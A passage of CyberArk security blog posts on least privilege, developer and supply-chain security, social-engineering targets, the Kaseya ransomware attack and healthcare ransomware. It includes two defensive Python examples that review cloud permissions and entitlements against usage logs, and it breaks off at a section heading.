A number of security research frameworks, including the MITRE ATT&CK Framework and Cloud Security Alliance Cloud Controls Matrix, echo similar least privilege guidance, as do all of the leading cloud providers.


Despite widespread consensus on the importance of least privilege, effectively managing permissions remains a significant challenge for many organizations due to rampant misconfigurations and common provisioning practices that assign default permissions based on department or role. The result? Many identities have permissions that they do not need or use, creating significant security and compliance risk.

To make cloud permissions management actually manageable, many security and Identity and Access Management (IAM) teams are turning to AI-powered solutions that can automatically detect and clean up misconfigured and unused cloud permissions, while applying least privilege controls consistently across their cloud estates.
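As an added illustration of the permissions clean-up just described (example code, not CyberArk Cloud Entitlements Manager’s logic), the following Python shows the rule-based core of such a review: expand a policy’s wildcards against an action catalogue, list the permissions that were granted but never used, flag the high-impact ones, and emit a right-sized policy. The action catalogue, the policy and the usage record are all constructed; a real review would take usage from the cloud provider’s access logs or last-accessed reports.

```python
"""Rule-based right-sizing of a cloud IAM policy: compare what the policy grants
(after wildcard expansion) with what the identity actually used, then emit a
least-privilege policy. All inputs are constructed for this example."""
import copy
import fnmatch
import json

# Constructed subset of a provider's action catalogue, used to expand wildcards.
ACTION_CATALOGUE = [
    "s3:GetObject", "s3:PutObject", "s3:DeleteObject", "s3:ListBucket", "s3:DeleteBucket",
    "ec2:DescribeInstances", "ec2:StartInstances", "ec2:StopInstances", "ec2:TerminateInstances",
    "iam:PassRole", "iam:CreateUser", "iam:AttachUserPolicy",
    "kms:Decrypt", "kms:Encrypt",
]

# Constructed policy of the kind provisioned by department or role: broad wildcards.
GRANTED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["s3:*", "ec2:Describe*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["kms:Decrypt"], "Resource": "*"},
    ],
}

# Constructed usage record: actions the identity invoked during the review window.
# Caveat: a short window misses rarely used but legitimate actions (e.g. DR runbooks),
# so the output is a proposal for review, not an automatic change.
USED_ACTIONS = {"s3:GetObject", "s3:ListBucket", "ec2:DescribeInstances", "kms:Decrypt"}

# Unused permissions that would let an attacker escalate or destroy are reported first.
HIGH_IMPACT_PATTERNS = ("iam:*", "*:Delete*", "*:Terminate*", "kms:*")


def _as_list(value):
    """IAM allows 'Action' to be a single string or a list."""
    return [value] if isinstance(value, str) else list(value)


def expand_actions(patterns, catalogue=ACTION_CATALOGUE):
    """Resolve IAM-style wildcards to concrete actions; IAM matching is case-insensitive."""
    concrete = set()
    for pattern in _as_list(patterns):
        concrete.update(a for a in catalogue if fnmatch.fnmatchcase(a.lower(), pattern.lower()))
    return concrete


def granted_actions(policy):
    """Every concrete action any Allow statement grants."""
    return set().union(*(expand_actions(s["Action"])
                         for s in policy["Statement"] if s["Effect"] == "Allow"))


def unused_permissions(policy, used):
    """Granted but never exercised: the excess that regulators ask to be removed."""
    return sorted(granted_actions(policy) - used)


def high_impact_unused(policy, used):
    """Subset of the unused permissions that matches a high-impact pattern."""
    return sorted(a for a in unused_permissions(policy, used)
                  if any(fnmatch.fnmatchcase(a.lower(), p.lower()) for p in HIGH_IMPACT_PATTERNS))


def right_size_policy(policy, used):
    """Keep each Allow statement's Resource scope but narrow Action to what was used;
    Allow statements granting nothing that was used are dropped, Deny statements kept."""
    new_policy = {"Version": policy["Version"], "Statement": []}
    for stmt in policy["Statement"]:
        if stmt["Effect"] != "Allow":
            new_policy["Statement"].append(copy.deepcopy(stmt))
            continue
        kept = sorted(expand_actions(stmt["Action"]) & used)
        if kept:
            new_policy["Statement"].append({**stmt, "Action": kept})
    return new_policy


if __name__ == "__main__":
    print("Unused:", unused_permissions(GRANTED_POLICY, USED_ACTIONS))
    print("High impact:", high_impact_unused(GRANTED_POLICY, USED_ACTIONS))
    print(json.dumps(right_size_policy(GRANTED_POLICY, USED_ACTIONS), indent=2))
```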

In the words of former U.S. Deputy Attorney General Paul McNulty, “If you think compliance is expensive, try non-compliance.” Don’t wait for an audit — or a costly breach — to identify your cloud compliance gaps. Give our SaaS-based CyberArk Cloud Entitlements Manager a 30-day free trial and assessment to analyze and remediate excessive access in your cloud environments — with no infrastructure required. See how you can meet regulatory mandates around least privilege access while safely scaling your business in the cloud.

4 Risk-Based Steps for Securing Developers and Code https://www.cyberark.com/blog/4-risk-based-steps-for-securing-developers-and-code/ Fri, 16 Jul 2021 13:00:24 +0000 https://www.cyberark.com/?p=120732

As software supply chain attacks surge in frequency and scale, it’s become apparent that cyber criminals are looking for stealthy ways to make malicious changes or inject malware into software — before it’s deployed — often by compromising developers’ credentials or the administrative privileges of a development tool. Once a powerful password or key is stolen, it’s easy to tweak a software library or modify a few image registry settings to inject malware or compromise pipelines in a way that is often exceedingly difficult to detect.

More troubling still, many users — including developers — are over-privileged users who have access to broad swaths of an IT environment — in other words, they’re highly attractive targets. And in many cases, they’re shouldering more responsibility for managing these environments. According to Brandon Traffanstedt, senior director in CyberArk’s global technology office, cyber criminals have taken note that some of the easiest targets are developers with access rights that allow them to configure a wide range of systems to provision applications — but without the greatest appreciation for security. “Cyber criminals know developers are given as much access as they need,” he says. “We need to secure their identities — and their access — without constraining the amazing work they’re doing.”

The Trouble with Securing Identities Across a DevOps Pipeline

Cyber criminals target developers for two primary reasons. The first is to exploit the elevated privileges they require to access a wide range of applications and platforms strewn across an extended enterprise. The second is to uncover as many application secrets as possible that might reside within code, in environmental variables or anywhere outside of a secure secret store or vault. A recent example of this is the April 2021 Codecov breach, during which attackers gained access to a credential based on an error in the company’s Docker image creation process. They used this credential to modify Codecov’s Bash Uploader script and used that to harvest exposed credentials and secrets — too often easy and unprotected targets — from numerous customer CI/CD environments.

Some organizations have a large number of users who are privileged users “by default,” with elevated access rights whether they need them or not. Developers, however, have privileged access to more crucial platforms than almost anyone else and are relied upon to ensure that modern businesses remain competitive. As responsibility for managing applications on an end-to-end basis becomes the norm, the more control over IT environments a developer is likely to have. “There’s been an organic shift left with developers and pipelines making up the lifeblood of successful businesses — from pizza delivery to insurance,” says Traffanstedt.

The challenge is finding a way to ensure applications are built and deployed securely without slowing down the application development process, notes Traffanstedt. “Security needs to be part of the overall quality assurance process already in place to provide a foundation that developers can use to make their lives easier,” he says. Otherwise, the notion of security as a roadblock to agile development will persist.

Fortunately, developers are making progress. As organizations increasingly embrace DevSecOps best practices, there’s a greater awareness of how vulnerable software supply chains really are and what can be done to incorporate transparent security. The simplest phishing attack can result in losing a set of credentials that provides cyber criminals with the keys to the entire development environment.

Unfortunately, organizations can’t wait for developers to master all the nuances of cybersecurity on their own or expect developers to keep security common practices top-of-mind. Security teams have been given a clear mandate to protect the software supply chain, starting with who (or what) is allowed to access what, when and for how long. The challenge is finding a way to achieve that goal while having the least possible impact on developer productivity. After all, as organizations become more dependent on software to drive digital processes, the rate at which software is built, deployed and updated directly correlates to corporate financial performance.

Risk Management in the Age of Shift Left

Cybersecurity has always been about limiting risk. Securing software supply chains in that regard is no different than in any other IT environment — but it has to be done fast. Here are steps to bolster DevOps security while maintaining developer velocity, focusing on addressing the most risk most efficiently.

The first order of security business is always going to be securing the workstations and tools developers use regularly.

1. Secure Developer Workstations and Tools

Sometimes, developers need to elevate certain tools they use to write and commit code. Many organizations solve this by providing full local administrative rights. This should never be the default, and the principle of least privilege should be consistently enforced. “The goal is to reduce, if not completely eradicate, the number of local administrators that you have while providing just the right level of elevation based on policy,” says Traffanstedt.

And since many credential theft attacks can be executed without local admin rights and from a single developer’s workstation, it’s also important to protect against credential theft from browsers where application secrets might be stored to access repositories or tools with command line interfaces (CLI) — and where those same secrets can be stored right in configuration files. The key to this approach is leveraging solutions that do not require archaic allow/deny listing policies but instead provide proactive and predictive controls.

2. Secure the Automation

Another threat vector that needs to be secured is the automation frameworks developers now routinely employ to configure infrastructure as code, along with the ever-growing list of developer tools used throughout the pipeline. It’s just as critically important to both manage and rotate the secrets used by these tools and platforms, as well as to ensure that applications and processes authenticate securely to retrieve those managed secrets. Otherwise, you’ve done a significant amount of work for very little value.

Many of the tools and the services offered by cloud vendors and container platforms have some built-in secrets management capabilities. However, each tool vendor takes a different approach to security, has a varying level of maturity and experience and uses different interfaces — effectively establishing its own “island of security.” Using these native secrets management capabilities is certainly better than no security at all, says Traffanstedt. “But at some point, when it comes to simplifying compliance and configuration in addition to supporting code portability, having one centralized store of record can allow you to identify gaps in policy and push changes much faster than liaising with disparate tools and providers.”

3. Determine Who Really Needs Access to What

The next step is to determine who precisely on any development team can commit source code and elevate binaries as part of a DevOps workflow. Not every member of the DevOps team needs to have full administrative rights to every system and tool that make up the pipeline.

Just-in-time privileged access controls can give specific developers the flexibility to access what they need, when they need it, based on role. When privileges must be elevated, cybersecurity teams should monitor the resources that are being accessed — and by whom. In many cases, it becomes apparent that many developers only need local admin rights to write code. Only a handful of members of the development team are often responsible for managing code commits and elevating code into production environments. “Organizations need to make sure they take a least privilege approach to managing access across the DevOps pipeline,” says Traffanstedt.

4. Secure Tier 0 Access to Resources and VMs

In a similar vein, developers should not have direct access to virtual machines in production environments. If they require access, they should broker it through session management or a secure web access gateway to minimize risks. As with all security controls, exceptions will occur and those should be subject to a heightened level of approval and scrutiny. Under no circumstances should exceptions made to policies be allowed to become permanent. If a policy activation is permanent or very loosely restricted, then it is essentially the equivalent of standing access. There needs to be a strict process for approving the assignment and activation of policies across the entire DevOps workflow. Keep in mind that in a perfect world, human hands would not touch infrastructure directly in day-to-day operations — instead, they would leverage elements of automation to make changes.

Pay extra attention to cloud platforms that provide users with several levels of access options, many of which amount to yet another instance where a developer is overprivileged. The same least privilege rules and session isolation and monitoring processes applied in an on-premises environment need to be extended to the cloud, planning especially for the continued evaluation of how human and non-human entities are permissioned as well as for the heightened scale that the cloud can provide.
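As an added illustration of step 3 (and of the unused-permission cleanup described in the cloud compliance post above), not code from CyberArk or from this post: a review that compares the standing entitlements granted to pipeline identities against an access log, recommending revocation for anything unused inside the review window, just-in-time activation instead of standing grants for elevated entitlements, and flagging successful use of an entitlement that was never granted. The identities, entitlement names, log format, review window and the ELEVATED policy set are all constructed assumptions.

```python
from collections import Counter
from datetime import datetime, timedelta

# Hypothetical policy (not from the post): entitlements that confer admin or
# production access. The post's rule is that these should never be standing.
ELEVATED = {"repo:admin", "prod-vm:ssh", "prod-vm:admin"}

# Constructed sample: standing entitlements granted to pipeline identities.
GRANTED = {
    "alice": {"repo:commit", "repo:admin", "registry:push", "prod-vm:ssh"},
    "bob": {"repo:commit", "registry:push", "prod-vm:ssh"},
    "ci-runner": {"repo:read", "registry:push", "vault:read"},
    "carol": {"repo:commit", "prod-vm:ssh", "prod-vm:admin"},
}

# Constructed access log: "<ISO timestamp> <identity> <entitlement> <result>".
ACCESS_LOG = """\
2021-05-02T09:00:00 alice repo:admin ok
2021-06-01T09:12:00 alice repo:commit ok
2021-06-01T10:40:00 bob repo:commit ok
2021-06-02T14:02:50 ci-runner repo:read ok
2021-06-02T14:03:00 ci-runner registry:push ok
2021-06-02T14:03:05 ci-runner vault:read ok
2021-06-03T08:30:00 carol prod-vm:ssh ok
2021-06-18T16:20:00 carol prod-vm:admin ok
2021-06-20T11:00:00 alice registry:push ok
2021-06-25T13:00:00 bob prod-vm:admin ok
2021-06-26T13:00:00 bob repo:admin denied
2021-06-28T09:00:00 bob repo:commit ok
"""


def parse_log(text):
    """Turn the constructed log lines into (timestamp, identity, entitlement, result)."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, identity, entitlement, result = line.split()
        events.append((datetime.fromisoformat(ts), identity, entitlement, result))
    return events


def usage_in_window(events, now, window_days=30):
    """Count successful uses of each (identity, entitlement) inside the review window.

    Denied attempts are not usage evidence, and events older than the window
    must not keep an otherwise dormant entitlement alive."""
    since = now - timedelta(days=window_days)
    counts = Counter()
    for ts, identity, entitlement, result in events:
        if result == "ok" and since <= ts <= now:
            counts[(identity, entitlement)] += 1
    return counts


def review_entitlements(granted, events, now, window_days=30):
    """Recommend, per identity, what to revoke, convert to JIT, or keep,
    plus any successful use of an entitlement that was never granted."""
    counts = usage_in_window(events, now, window_days)
    empty = lambda: {"revoke": [], "convert_to_jit": [], "keep": [], "unexpected": []}
    report = {identity: empty() for identity in granted}
    for identity, entitlements in granted.items():
        for ent in sorted(entitlements):
            if counts[(identity, ent)] == 0:
                report[identity]["revoke"].append(ent)      # granted, never used
            elif ent in ELEVATED:
                report[identity]["convert_to_jit"].append(ent)  # used, but should not stand
            else:
                report[identity]["keep"].append(ent)
    # Successful use without a grant: a broken control or a misused credential.
    for (identity, ent) in counts:
        if ent not in granted.get(identity, set()):
            report.setdefault(identity, empty())["unexpected"].append(ent)
    for rec in report.values():
        rec["unexpected"].sort()
    return report


if __name__ == "__main__":
    report = review_entitlements(GRANTED, parse_log(ACCESS_LOG), datetime(2021, 7, 1))
    for identity, rec in sorted(report.items()):
        print(identity, rec)
```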

The Zero Trust Future-Present for Supply Chain Security

Securing the development pipeline — the heart of the digital supply chain — is not a one-time event. Just like the development of modern applications, security needs to be a continuous process and tackled in risk-prioritized phases. Security and Identity and Access Management (IAM) teams must constantly reassess permissions, regardless of whether developers (and their applications) are employing identity management frameworks or not. Organizations should assume no identity — person or machine — is to be trusted as part of a larger Zero Trust approach to security.

At the same time, application secrets need to be closely guarded. A vault that both encrypts application secrets and safeguards how those secrets are accessed is the last line of defense for any software supply chain.

The challenge and opportunity for security professionals is to present themselves as allies in the effort to secure the software supply chain. While CI/CD pipelines leverage more automation than ever, the fact of the matter is that developers are people too — people who have a profoundly powerful impact on the success of our organizations and whose identities and processes deserve the same level of security and operational considerations as any executive’s.

Attackers Are After Privileged Users. Do You Know Who They Are? https://www.cyberark.com/blog/attackers-are-after-privileged-users-do-you-know-who-they-are/ Tue, 13 Jul 2021 13:00:27 +0000 https://www.cyberark.com/?p=120707

Attackers have more potential entry points into your organization than ever before. And many are brushing up on their acting skills, getting more creative and increasingly personal to spoof the most unsuspecting employees and launch their attacks.

New IDSA Survey Indicates Decreased Confidence in Securing Employee Identities

Nearly every part of daily life — at home and work — turned upside down last year. The global shift to remote work and eLearning, large-scale investments in SaaS and cloud services and strong focus on digital transformation has brought a surge in newfound technologies and identities.

According to the “2021 Trends in Securing Digital Identities” survey from Identity Defined Security Alliance (IDSA), 83% of IT security and identity professionals experienced an increase in identities since last year, with one in five (20%) reporting that the number of identities they manage increased by more than 25%. Meanwhile, security teams’ confidence in their ability to secure employee identities dropped from 49% to 32%.

This decrease in confidence in securing employee identities is particularly interesting on several fronts. First, the survey found that confidence levels in securing privileged users, customers and partners remained fairly steady. And in contrast, respondents reported increased confidence in securing machine identities, such as service accounts and applications. So why are employee identities, specifically, becoming harder to secure? Perhaps it’s because attackers are changing things up.

The New Faces of Privileged Users

One thing that hasn’t changed is the way attackers establish initial entry points into target organizations: credential theft methods like spear-phishing and impersonation are as popular as ever. In fact, the 2021 Verizon Data Breach Investigations Report (DBIR) found that 36% of all breaches last year involved phishing — up 11% from the previous year. Since employees are conducting more and more of their personal lives online, it’s becoming even easier for attackers to gather the necessary information required to execute their social engineering campaigns — monitoring public profiles and social media conversations to collect intel on everything from work routines to personal relationships, beliefs, motivations and more. After sizing them up, attackers often connect with their targets on social media and attempt to gain their trust.

What has changed are the individual targets of these social engineering attacks. Traditionally, adversaries focused their attention on IT admins with highly privileged access. But as “The CISO View 2021 Survey: Zero Trust and Privileged Access” recently discovered, they’re going after new user populations, from executives and software developers to end-user employees — including business users with direct access to sensitive data or systems the attacker is interested in. Let’s review some of these new user populations and highlight examples of how they can become victims of social engineering attacks:

The Developer

This software engineer leads a team of developers at a leading financial institution, and her impressive list of technical certifications features prominently on her LinkedIn profile page. Outside of work, she’s building a large social media following of coders who flock to her channels for a mix of dry humor and deep programming know-how. A few months ago, a fellow developer connected with her on LinkedIn, referencing their shared interest in Python and Ruby programming languages. They soon became fast online friends. One day, this new friend mentions that a cousin is looking for a development job in the area. The software engineer promises to pass along her information and soon receives the cousin’s résumé in her work email. She clicks on the résumé and skims it before forwarding it to HR. Little does she know that her “friend” is really a cyber attacker who created a fake online persona and has spent months building a rapport with her in order to send that email, which contains malware cleverly disguised in the attachment. The developer’s LinkedIn profile, coupled with her daily social posts, helped the attacker gauge the high levels of access she likely had at her employer organization, and unintentionally, painted a target on her back.

It’s not just human developers that attackers are after. They know privileged credentials and secrets are often embedded directly into code and target application and machine identities as a way to launch attacks that can spread across customer-facing products — and in some cases — infect the entire digital supply chain.

In some instances, attackers are able to bypass the credential theft step altogether by impersonating an executive or third party to make direct requests for funds or data. Consider these next two business user examples:

The Middle Manager

This financial controller works at a large manufacturing organization. It’s Monday morning, and she’s just beginning her day. Coffee in hand, she opens an email marked “urgent” from the CEO of her company’s parent organization, which is located halfway around the world. He explains that the banks are closed for a holiday, and he needs to urgently wire funds to a third party to close a big deal. She’s suspicious, but the email looks legitimate and comes from the CEO’s verified email address.

Suddenly, her phone rings. It’s the CEO calling from overseas to follow up. He explains the situation again, providing all of the necessary information on the company and transaction. The financial controller follows protocol, getting a second team member to review the request and verify the details. Then, they authorize the wire transfer. Just a few hours later, they realize the call was a scam — and the company is out millions of dollars after trying unsuccessfully to cancel the transaction.

The Research Assistant

Working for a prominent biotech company, this researcher is developing a new lifesaving drug. His team collaborates with analysts in a partner healthcare organization, and each team member has access to large amounts of sensitive patient and medical data to fuel their research.

One day, he receives an email from a partner analyst asking him to send over the latest data. Since he works with this analyst regularly, he attaches the requested information without a second thought and hits “send.” However, this highly lucrative intellectual property hasn’t gone to his trusted research partner — instead, it’s now in the hands of a nation-state attacker.

End-Users are the New Privileged Path of Least Resistance to Valuable Systems and Data

Employees or contractors with high-value access are becoming more interesting targets for attackers for several reasons. Like everyone, they want to work smarter — not harder. Rather than breach an arbitrary workstation and then move around the network searching for a particular system, attackers can pursue more direct routes by precisely targeting individual end-users.

Emphasis has also shifted to end-users because it’s becoming more difficult to compromise IT admin accounts. Many organizations are aware that damaging breaches occur when attackers obtain powerful admin credentials and have put strong controls in place through a privileged access management system. What’s more, opportunities for lateral movement within the network are getting harder for attackers to find. As more organizations move to a Zero Trust model, more endpoints connect to resources directly rather than being given broad access.

Protecting End-User High-Value Access

The first step in protecting high-value access is identifying the employees and third parties who directly touch your company’s valuable systems. Depending on your organization, these could be financial systems, customer databases, product development systems or manufacturing processes.

Then, consider all of the ways these systems and data can be accessed by users: through what applications and infrastructure, interacting with which other types of users and using what devices?

From there, focus on implementing a strong mix of Identity Security controls, such as least privilege enforcement and adaptive MFA, along with targeted user training to raise awareness and strengthen security practices.

End User Protection Tips

To further explore the shifting privileged landscape and how to evolve your privileged access control strategy for a Zero Trust model, check out these practical recommendations from CISOs on the front lines.

In Kaseya Supply Chain Ransomware Attack History Repeats Itself https://www.cyberark.com/blog/in-kaseya-supply-chain-ransomware-attack-history-repeats-itself/ Wed, 07 Jul 2021 13:00:59 +0000 https://www.cyberark.com/?p=120263

While many Americans took off early to jump-start the Independence Day weekend, cyber attackers were launching the single biggest ransomware attack in history. It’s estimated that at least 800 to 1,500 organizations — primarily managed service providers (MSPs) and their customers — have been impacted, and additional victims are still being identified. Law enforcement and government cybersecurity agencies involved in the ongoing investigation, including the Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA), are urging affected organizations to take immediate steps to implement cybersecurity best practices.

Initial Kaseya Infection Aims for Scale and Impact

The ransomware attack initially targeted Kaseya, an IT management software provider for MSPs and small-to-medium sized businesses. Based on initial reports, attackers likely identified and exploited a vulnerability to compromise Kaseya’s Virtual System Administrator (VSA) solution, which is used to remotely monitor and manage endpoints and servers.

With control over SaaS and on-premises Kaseya VSA servers — along with other MSP-managed on-premises servers — the threat actors pushed a phony software update containing the ransomware to all managed endpoints. Similar to the SolarWinds supply chain attack, the malware spread across Kaseya’s global customer base and their downstream customers. The potential breadth of the Kaseya attack “may make it so that we are unable to respond to each victim individually,” said the FBI in a statement.

The attackers claiming responsibility demanded a staggering $70 million ransomware payment from Kaseya to restore affected corporate and customer data. Meanwhile, organizations across the supply chain soon began to feel the ripple effects — from dental offices to accounting firms to restaurants. In Sweden, a major grocery store chain was forced to close hundreds of stores for days due to inoperative cash registers. In New Zealand, schools and more than 100 kindergartens went offline and had to resort to pen and paper. According to the New York Times, some victim organizations have been asked for as much as $5 million in ransom payments.

Echoes of Cloud Hopper Supply Chain Attack

Though details of this international ransomware campaign are still emerging, the attack patterns are reminiscent of the mega Cloud Hopper attack, a years-long cyber invasion that was first uncovered in 2016 and targeted the world’s largest technology service providers and their customers.

We asked Lavi Lazarovitz, senior director of Cyber Research at CyberArk Labs, about the similarities, and how ransomware operators are honing their craft to become more sophisticated, targeted, and persistent — sometimes conducting reconnaissance for several years before making a move.

“With Cloud Hopper, one compromised endpoint went on to impact hundreds of firms that had relationships with breached cloud providers. For one victim, the attack cycle continued for at least five years. In this attack, like the previous attack on SolarWinds, threat actors capitalized on automation and trust that provide the means by which malware can be distributed and deployed as legitimate corporate software,” he said.

He continued, “In the Kaseya incident, the attackers are focusing on the compromise of trusted software and trusted processes. Targeting trusted services allows the threat actors to leverage the trusted services’ granted permissions and access.”

Cloud Hopper, SolarWinds, Codecov, and many recent ransomware attacks have proven that traditional security boundaries are no longer enough. By targeting cloud service providers, adversaries can move fluidly between “isolated” environments and across multiple organizations with ease. Lateral movement is no longer restricted to one organization’s physical network — exponentially extending the attackers’ reach.

CISA and FBI Guidance for Ransomware Risk Mitigation

To help minimize attack impact and mitigate future risk, the CISA and FBI have issued guidance for MSPs and their customers affected by the Kaseya VSA supply chain ransomware attack.

Their recommendations include cybersecurity fundamentals, such as enabling multi-factor authentication (MFA) and enforcing the principle of least privilege. They align with the CyberArk Blueprint for Identity Security Success, a best practices framework to help disrupt and prevent the common identity attack chain. We encourage any organization seeking ways to bolster ransomware protections to give it a look, with emphasis on these three steps:

1. Implement or strengthen privileged access controls. Focusing on least privilege enforcement can help ensure both human and machine identities have the minimum levels of access required. Other effective privileged access controls, such as rotating privileged credentials and monitoring sessions, can help to quickly reduce risk.

2. Take a defense-in-depth approach to endpoint security. Ransomware operators exploit endpoint vulnerabilities to steal or encrypt confidential information. Deploying least privilege measures is an important part of a defense-in-depth strategy that helps prevent adversaries from moving laterally and potentially forcing them to use methods that expose their presence.

3. Enable multi-factor authentication (MFA). It’s one step that can block a majority of account compromise attacks. If access controls are already in place, consider strengthening them with adaptive MFA that uses AI to assign risk to each access event based on context and behavior.

The Kaseya VSA attack shows us yet again how ransomware supply chain attacks are increasing in frequency, sophistication, and scale. Now is the time to take proactive steps to secure your organization’s most valuable assets and stay a step ahead of attackers.

The DevSecOps Mission: Get Security ‘Right’ from the Start https://www.cyberark.com/blog/the-devsecops-mission-get-security-right-from-the-start/ Thu, 01 Jul 2021 13:00:31 +0000 https://www.cyberark.com/?p=119961

The SolarWinds attack, along with others that have torn across supply chains in alarming succession since, has been a shock to so many systems (literally and figuratively). But by spotlighting ubiquitous software vulnerabilities and insecure development practices, it was also a catalyst for change. For many, it renewed a push toward cross-functional unity and integrated security that encapsulates the DevSecOps ideal.

Kurt Sand, CyberArk General Manager of DevSecOps, views the digital supply chain breach as nearly as useful as it was disruptive. “There are two things, in my view, that SolarWinds helped with,” Sand tells us. “One, it shifted emphasis from application security to the security of the development tools themselves. You cannot protect your applications without applying the same security rigor to the tools used to build them.” As for the second thing, the attack drove a lot of tough — but necessary — questions and organizational self-reflection, he says. “A number of boards started asking their CISOs or the CIOs, ‘What’s our DevSecOps strategy?’ As soon as that question starts to come from the top-down, it’s going to get attention.”

Keeping Security Front and Center Since Day One

Sand has seen the change in perception and attitude toward security evolve over time, throughout his own DevOps career. “I started as a software developer in sensitive military applications, which fostered a keen sense of security from day one on the job,” Sand says. Working on sonar and radar software developed for General Electric, he was subject to stringent security measures — including having to “sign out” anything printed from the office printer.

Over the years, Sand would notice the opposite happening in other, less “closed room” industries, where security would often be the first corner cut in the service of speed and hustle. Agile software methodologies were making it easier to build applications faster, but production couldn’t keep pace.

So, as Sand explains, the original idea behind DevOps was to “break that wall down so we could actually deliver software through operations at the speed of development.” Security was one more bottleneck development teams seemingly couldn’t afford.

“I don’t think that anyone intentionally meant for security to be left out,” Sand says. “For developers, it just wasn’t a focus. We were after: idea-to-production — or idea-to-customer faster.”

But as innovation ramped up, so did attackers’ efforts to undermine, manipulate and “crack” all this new software. It became clear that security was not only vital, it needed to be part of the whole process from Step One.

“Otherwise, we would just be pumping insecure software faster to production, only to end up with a costly mess that creates more work for everyone,” he says.

Today, the need for tightly integrated DevOps security is well understood, yet in many organizations, achieving “DevSecOps” is still somewhat of a holy grail. Reaching this “ideal state” ultimately boils down to people and culture — both of which take time, transparent communication, empathy and top-level support to change. It involves understanding how different groups operate and what skills are needed to bridge divides.

Finding Internal Security Champions

In the aftermath of SolarWinds and other attacks like Codecov, Sand believes there is another strong opportunity for organizations to drill down on how they address security as they work towards DevSecOps.

According to Sand, many organizations still tend to treat security like a quarterly mandatory gathering, an issue you focus on for 40 minutes and then continue about your day. It reinforces the idea that security is something outside the boundaries of most job descriptions, something most only have to be concerned with at certain times. But removing security concerns from the DevSecOps process entirely ends up making more work for everyone in the end.

Says Sand, “It’s like designing a house. After you’ve built it, it’s pretty hard to make changes. It’s easy to move the bathroom around when it’s on paper; it’s trickier when it’s already in place.”

That said, embedded security also, unintentionally, feeds into some developers’ view of security as a roadblock. And when security isn’t involved until the end of the development process, forcing them to make last-minute emergency fixes and slow delivery timelines, it’s easy to see why this misconception persists.

One step that organizations can take is to establish a “security champion” in every R&D team, someone who can maintain focus on mitigating vulnerabilities and potential problem spots, while also keeping in constant communication with others along the development pipeline. “You could call it a Center of Excellence — although I prefer the term ‘Centers of Enablement’ — a distinct team made up of people with specific areas of expertise,” Sand says. “These security champions meet and exchange best practices and bring them back to their individual teams. I’ve seen that be quite effective at actually pushing the security agenda into DevOps teams because one of their peers now owns that part of their responsibility.”

Taking the Security Steps Necessary for DevSecOps Success

When it comes to developer engagement, security teams also need to re-think their messaging approach, says Sand. While there is use in encouraging development teams to think like attackers and anticipate potential issues, it’s more important to frame security in terms of overall project success. It’s one thing to say, “this code might have security issues” and quite another to say, “if you don’t pay attention to this, your entire project could fail.”

As Sand explains: “The thing that developers want more than anything is for ‘their baby’ to succeed, right? For their application to gain traction and customer confidence. So, companies need to educate their development teams on reported attacks stemming from software vulnerabilities and insecure coding practices. It’s an interesting way to build support.”

It’s part of how security teams can embrace (or at least better understand) the developer mindset, which is also something Sand has seen an increase in recently. While DevOps teams are developing more security-minded skillsets, it’s been even more noticeable how many security practitioners are — in Sand’s words, “modernizing” — and bringing their own development skills to the table. This is what Sand refers to as the “sweet spot.”

To put it in simpler terms, Sand would like to see security evolve into something that just “is” right from the start. “What DevSecOps seeks to do is just say, ‘Let’s keep doing DevOps but let’s use security all the way through from left to right.’”

Ransomware Is Why Healthcare Endpoint Security Needs Urgent Care
https://www.cyberark.com/blog/ransomware-is-why-healthcare-endpoint-security-needs-urgent-care/ (Tue, 29 Jun 2021 13:00:46 +0000)

Throughout the pandemic, a wave of ransomware attacks disrupted operations in healthcare organizations around the world. As frontline workers fought to keep patients alive, many documented records by hand and struggled to deliver effective care in the absence of electronic patient health information (ePHI) and lifesaving, internet-connected medical equipment.

Universal Health Services, which operates 400 hospitals and facilities in the U.S. and U.K., suffered a particularly devastating blow in an attack that wiped out IT systems, postponed treatment and elective procedures, ultimately causing $67 million in lost revenue and reputation damage. After ransomware extortion took down Oregon-based Sky Lakes Medical Center’s systems, the hospital refused to pay the requested ransom but announced it would need to replace more than 2,000 computers and servers to “start fresh.” And an attack on a German hospital forced accident and emergency departments to close. An ambulance transporting a patient suffering from an aortic aneurysm was diverted to another hospital, delaying her treatment by an hour. She died shortly after. Later, prosecutors would launch a negligent homicide investigation, saying the ransomware attackers were to blame.

“If we don’t break the back of this cycle, a problem that’s already bad is going to get worse,” former Acting U.S. Deputy Attorney General John Carlin told the Wall Street Journal a few months ago. Looking back on the first half of 2021, this was a harbinger of things to come.

(Figure: Ransomware Attacks on Healthcare Endpoint Security in 2020)

Interconnected Healthcare Systems: Highly Vulnerable Targets

Healthcare data has long been an attractive target for attackers. Hospitals and other private healthcare organizations routinely store ePHI records, which include personally identifiable information (PII). These records must be compliant with many regulations and standards such as the Health Insurance Portability and Accountability Act (HIPAA). Yet due to widespread resource constraints and legacy system limitations, many health records are stored without proper security protections. And unlike other industries, healthcare organizations cannot delete patient records after specified periods of time; they must remain accessible (and secure) forever.

As portals to this sensitive data, the computers used within hospitals and healthcare systems are also major attack targets. Industrial-grade medical computers are often wheeled around the hospital floor by doctors and nurses to efficiently order and administer drugs, control medical devices that perform imaging scans or tests, and display diagnostic images and lab results. In many medical practices, computers are stationed in every room, giving providers fast access to ePHI records and facilitating communication among team members. And in operating theaters, computers play a critical role in pre-surgery planning, image visualization, patient monitoring and even robotic-assisted procedures.

Attackers are not stopping at commandeering these critical computers and servers. They’re also reaching for medical IoT devices with increasing frequency. For example, the WannaCry ransomware attack infected 1,200 diagnostic devices, and many more were taken offline to stop the spread.

While increasing interconnectivity between ePHI, computer systems and IoT devices is helping providers transform the way they deliver care, it is also adding even more challenges to the growing list of cybersecurity concerns.

When Downtime Isn’t an Option

Whether politically or financially motivated, attackers understand that in the business of life and death, healthcare organizations simply cannot afford to negotiate for days or weeks while their systems are held hostage. It’s estimated that ransoms totaling $15.6 million were demanded of U.S. healthcare organizations alone last year and that organizations paid a collective $2,112,744 to ransomware gangs. In reality, the total is likely much higher than what has been publicly reported. But even when organizations pay the requested ransom, there’s no guarantee that healthcare systems will be restored — or that the attackers won’t come back for more.

Operator-Based Ransomware and Double-Extortion Demands on the Rise

